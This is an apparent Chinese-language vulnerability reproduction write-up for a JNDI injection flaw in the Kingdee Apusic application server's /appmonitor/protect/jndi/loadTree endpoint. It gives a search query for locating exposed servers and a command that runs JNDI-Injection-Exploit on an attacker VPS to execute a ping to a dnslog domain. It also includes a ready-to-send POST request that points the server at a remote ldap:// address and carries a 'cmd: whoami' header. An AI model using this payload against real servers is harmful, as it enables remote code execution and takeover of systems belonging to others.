登录 白背景

金蝶 Apusic应用服务器(中间件) loadTree JNDI注入漏洞

一、漏洞简介

金蝶Apusic应用服务器是国内第一个通过J2EE测试认证的应用服务器,全球第四家获得JavaEE 5.0认证授权的产品,完全实现J2EE等企业计算相关的工业规范及标准代码简洁优化,具备了数据持久性、事务完整性、消息传输的可靠性、集群功能的高可用性、以及跨平台的支持等特点。金蝶Apusic应用服务器存在JNDI注入漏洞,攻击者可利用该漏洞获取服务器控制权限。

二、影响版本

  • 金蝶Apusic应用服务器

三、资产测绘

    • hunterapp.name="Apusic 金蝶天燕 Server"&&web.title=="Welcome to Apusic Application Server"
    • 特征

    image.png

    四、漏洞复现

    1. 获取dns
    id0369.dnslog.cn
    1. JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar上传到vps
    java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 172.245.154.22 -C "ping id0369.dnslog.cn"

    image.png

    1. 漏洞利用
    POST /appmonitor//protect/jndi/loadTree HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
    Host: 
    Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
    Content-type: application/x-www-form-urlencoded
    Content-Length: 32
    cmd: whoami
    Connection: close
    
    jndiName=ldap://172.245.154.22:1389/zdsghu

    image.png

    1. 获取响应

    image.png

    原文: https://www.yuque.com/xiaokp7/ocvun2/zar3d5w3xyrq5o11